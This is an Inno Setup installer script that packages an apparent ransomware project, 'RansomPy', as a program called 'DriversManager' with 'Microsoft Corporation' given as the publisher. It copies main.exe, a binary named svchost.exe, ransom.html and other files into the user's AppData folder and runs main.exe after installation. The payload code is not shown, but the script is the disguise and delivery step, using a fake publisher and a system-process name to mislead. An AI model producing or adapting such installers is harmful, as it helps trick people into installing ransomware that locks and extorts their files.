; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "DriversManager"
#define MyAppVersion "3.2"
#define MyAppPublisher "Microsoft Corporation"
#define MyAppExeName "main.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application. Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{5739A953-FE40-4A54-9A28-FC29BA9733F7}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
DefaultDirName=AppData\{#MyAppName}
DisableDirPage=yes
DefaultGroupName={#MyAppName}
DisableProgramGroupPage=yes
LicenseFile=E:\0_Current_prog\RansomPy-master\RansomPy\LICENCE.txt
; Uncomment the following line to run in non administrative install mode (install for current user only.)
;PrivilegesRequired=lowest
OutputDir=C:\Users\0x746f6d\Desktop
OutputBaseFilename=DriversManager
Compression=lzma
SolidCompression=yes
WizardStyle=modern

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
Name: "french"; MessagesFile: "compiler:Languages\French.isl"

[Files]
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\{#MyAppExeName}"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\lib\*"; DestDir: "{userappdata}\DriversManager\lib"; Flags: ignoreversion recursesubdirs createallsubdirs
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\GuiCounter.exe"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\image.jpg"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\python3.dll"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\python37.dll"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\ransom.html"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\svchost.exe"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
Source: "E:\0_Current_prog\RansomPy-master\RansomPy\build\setup\vcruntime140.dll"; DestDir: "{userappdata}\DriversManager"; Flags: ignoreversion
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{group}\{#MyAppName}"; Filename: "{userappdata}\DriversManager\{#MyAppExeName}"

[Run]
Filename: "{userappdata}\DriversManager\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: nowait postinstall skipifsilent

[Dirs]
Name: "{userappdata}\DriversManager"